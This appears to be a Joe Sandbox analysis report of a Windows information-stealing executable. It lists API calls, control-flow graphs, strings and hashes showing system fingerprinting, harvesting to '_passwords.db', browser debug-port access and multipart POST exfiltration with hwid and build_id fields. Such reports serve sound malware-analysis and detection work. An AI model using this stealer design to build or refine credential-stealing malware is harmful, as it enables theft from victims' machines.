                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$Alloc$wsprintf$Open$Close$QueryValuelstrcatlstrcpy$lstrlen$CreateInfoInformationLocalNameProcess32$CapsCurrentDeviceHandleKeyboardLayoutListLocaleNextTime$CharComputerDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleObjectProcessorProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                                                      • String ID: yA$ yA$AV: $Computer Name: $Cores: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                                      • API String ID: 429884184-1563601650
                                                                                                                                                                                                                                                                                      • Opcode ID: 293ce5a3809314d421eefb1b24723dfc3c42a13475ce16b577afd8fa32f4f1d3
                                                                                                                                                                                                                                                                                      • Instruction ID: a189de7b01f339a385a03e3b66eada7a47a45b5f45c16819aff5fa1a06e03475
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 293ce5a3809314d421eefb1b24723dfc3c42a13475ce16b577afd8fa32f4f1d3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D125C3035012427591A76A359FF9FF5A5B8AD5F58B54048FB41B5E282CEBC0CC2A2EF
                                                                                                                                                                                                                                                                                      Function 00407DD0 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 297memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000009,?,00420BBE,?,?,?,C:\ProgramData\,0042150A), ref: 00407E8D
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EAE
                                                                                                                                                                                                                                                                                      • PathFileExistsA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 00407EC9
                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32 ref: 00407F01
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00407F15
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00407F2C
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 00407F39
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407F50
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00407F6B
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00407F77
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 00407F85
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00407F99
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00420AE3), ref: 00407FA1
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00407FBC
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 00408052
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040805C
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00408064
                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 0040806E
                                                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00408081
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 0040809C
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,_passwords.db), ref: 00407FC4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411D20: GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411D20: HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411D20: wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040814E
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00408158
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040815B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$FileProcesslstrcat$lstrcpy$Free$AllocCloseHandleSleeplstrlen$AllocateCopyCreateDeleteExistsPathReadSizeSystemTimewsprintf
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$_passwords.db
                                                                                                                                                                                                                                                                                      • API String ID: 3968722238-2269847733
                                                                                                                                                                                                                                                                                      • Opcode ID: a73068b94165eb1fb4997fdb96b272d7ecaa81c9b8b7d476d41781c2edaae806
                                                                                                                                                                                                                                                                                      • Instruction ID: e4e39b829918bb4bc11ac9051cc4079098e642cee815a62ce7fe490d7f0511b2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a73068b94165eb1fb4997fdb96b272d7ecaa81c9b8b7d476d41781c2edaae806
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEB1AC31910709ABCB10EFB1CD99AEEB779BF58304F00551AF81267191EF78A985CBA4
                                                                                                                                                                                                                                                                                      Function 00402AA0 Relevance: 40.7, APIs: 13, Strings: 10, Instructions: 473networkfilestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 3356 402aa0-402b51 call 410200 call 402790 call 4101c0 * 5 call 410530 InternetOpenA StrCmpCA 3373 403002-403031 InternetCloseHandle call 411250 * 2 call 410200 3356->3373 3374 402b57-402c90 call 4113b0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 4102e0 call 410290 call 410230 * 2 InternetConnectA 3356->3374 3387 403034-403083 call 410230 * 9 3373->3387 3374->3373 3450 402c96-402ccf HttpOpenRequestA 3374->3450 3451 402cd5-402ce0 3450->3451 3452 402ff8-402fff InternetCloseHandle 3450->3452 3453 402ce2-402cf4 InternetSetOptionA 3451->3453 3454 402cfa-402edb call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 4101c0 call 4102e0 * 2 call 410290 call 410230 * 2 3451->3454 3452->3373 3453->3454 3557 402ee0-402f30 call 410530 lstrlenA call 410530 * 2 lstrlenA call 410530 3454->3557 3567 402f32-402f41 Sleep 3557->3567 3568 402f73-402f8e InternetReadFile 3557->3568 3569 402f50-402f6e call 4101c0 call 410230 3567->3569 3570 402f43-402f4e 3567->3570 3571 402f90-402f95 3568->3571 3572 402fe1-402fed InternetCloseHandle call 410230 3568->3572 3569->3387 3570->3557 3570->3569 3571->3572 3575 402f97-402f9a 3571->3575 3577 402ff2-402ff5 3572->3577 3578 402fa0-402fd8 call 410340 call 410290 call 410230 InternetReadFile 3575->3578 3577->3452 3578->3572 3587 402fda-402fdf 3578->3587 3587->3572 3587->3578
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00403003
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                      • InternetConnectA.WININET ref: 00402C85
                                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00402CC4
                                                                                                                                                                                                                                                                                      • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00402CF4
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042150A,?,?,?,?,?,",?,?,build_id), ref: 00402EF9
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00402F16
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 00402F39
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402F86
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402FD0
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00402FE4
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402FF9
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$lstrcpylstrlen$CloseHandle$FileOpenReadlstrcat$ConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                                                      • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$hwid
                                                                                                                                                                                                                                                                                      • API String ID: 3613725345-1912073456
                                                                                                                                                                                                                                                                                      • Opcode ID: a9d75fe2b112728c04049bdae001af630768750935a4b770d8fde99ae311bea8
                                                                                                                                                                                                                                                                                      • Instruction ID: 645ce5d239cc6fa04e08d723ed68e7078ac0ea7ecf833b75b29ddf73a14f7ff9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9d75fe2b112728c04049bdae001af630768750935a4b770d8fde99ae311bea8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABF1543071012867CB15BBA2999A9FF776A9F84704F40005EF4066B291DFBC5EC6C7E9
                                                                                                                                                                                                                                                                                      Function 00404EA0 Relevance: 35.4, APIs: 15, Strings: 5, Instructions: 354networkfilestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 4022 404ea0-404ed3 call 41e9b0 InternetOpenA 4025 404f12-404f33 call 402400 4022->4025 4026 404ed5-404ee1 4022->4026 4035 405332-40533c 4025->4035 4027 404ee3-404eed 4026->4027 4028 404f38-404f44 4026->4028 4031 404ef0-404f0e 4027->4031 4030 404f50-404f6e 4028->4030 4030->4030 4033 404f70 4030->4033 4031->4031 4034 404f10 4031->4034 4036 404f75-404f8d 4033->4036 4034->4036 4037 404fa7-404fc6 call 40ee20 4036->4037 4038 404f8f-404fa2 call 402400 4036->4038 4042 404fe8-404ff4 4037->4042 4043 404fc8-404fd3 4037->4043 4038->4037 4045 404ff7-40502f call 406b00 4042->4045 4044 404fd5-404fe6 memcpy 4043->4044 4043->4045 4044->4045 4048 405051-40505d 4045->4048 4049 405031-40503c 4045->4049 4050 405060-405083 4048->4050 4049->4050 4051 40503e-40504f memcpy 4049->4051 4052 405085-405095 4050->4052 4053 4050c9-4050e5 4050->4053 4051->4050 4054 4050c0-4050c6 ??3@YAXPAX@Z 4052->4054 4055 405097-405099 4052->4055 4056 4050e7-4050f7 4053->4056 4057 40512b-405130 4053->4057 4054->4053 4060 40533f-405344 _invalid_parameter_noinfo_noreturn 4055->4060 4061 40509f-4050a4 4055->4061 4062 405122-405128 ??3@YAXPAX@Z 4056->4062 4063 4050f9-4050fb 4056->4063 4058 405132-405136 4057->4058 4059 405138 4057->4059 4064 40513c-40515a InternetOpenUrlA 4058->4064 4059->4064 4061->4060 4065 4050aa-4050af 4061->4065 4062->4057 4063->4060 4066 405101-405106 4063->4066 4067 405160-40518b InternetReadFile 4064->4067 4068 405261-40528e InternetCloseHandle call 402400 4064->4068 4065->4060 4069 4050b5-4050b8 4065->4069 4066->4060 4070 40510c-405111 4066->4070 4071 4051e5-405208 InternetCloseHandle * 2 call 4053f0 4067->4071 4072 40518d-405193 4067->4072 4082 4052f3-4052fa 4068->4082 4069->4060 4073 4050be 4069->4073 4070->4060 4075 405117-40511a 4070->4075 4083 405290 4071->4083 4084 40520e-405227 call 4053f0 4071->4084 4072->4071 4077 405195-405199 4072->4077 4073->4054 4075->4060 4079 405120 4075->4079 4081 4051a0-4051aa 4077->4081 4079->4062 4085 4051c0 4081->4085 4086 4051ac-4051b5 strlen 4081->4086 4087 405330 4082->4087 4088 4052fc-40530c 4082->4088 4093 405297-4052b1 call 402400 4083->4093 4084->4093 4099 405229-405240 call 4053f0 4084->4099 4090 4051c2-4051db call 406b00 InternetReadFile 4085->4090 4086->4090 4087->4035 4091 405327-40532d ??3@YAXPAX@Z 4088->4091 4092 40530e-405310 4088->4092 4090->4071 4104 4051dd-4051e3 4090->4104 4091->4087 4092->4060 4097 405312-405317 4092->4097 4098 4052b6-4052bd 4093->4098 4097->4060 4101 405319-40531e 4097->4101 4098->4082 4102 4052bf-4052cf 4098->4102 4099->4093 4111 405242-40525f call 40ed20 4099->4111 4101->4060 4105 405320-405323 4101->4105 4106 4052d1-4052d3 4102->4106 4107 4052ea-4052f0 ??3@YAXPAX@Z 4102->4107 4104->4071 4104->4081 4105->4060 4109 405325 4105->4109 4106->4060 4110 4052d5-4052da 4106->4110 4107->4082 4109->4091 4110->4060 4112 4052dc-4052e1 4110->4112 4111->4098 4112->4060 4114 4052e3-4052e6 4112->4114 4114->4060 4116 4052e8 4114->4116 4116->4107
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,http://localhost:,00000011), ref: 004050C1
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,http://localhost:,00000011), ref: 00405123
                                                                                                                                                                                                                                                                                      • InternetOpenUrlA.WININET ref: 00405152
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 00405183
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004051AD
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 004051D3
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 004051E6
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 004051EF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$??3@CloseFileHandleOpenReadmemcpy$strlen
                                                                                                                                                                                                                                                                                      • String ID: "webSocketDebuggerUrl":$"ws://$-$/json$http://localhost:
                                                                                                                                                                                                                                                                                      • API String ID: 1783597538-393890490
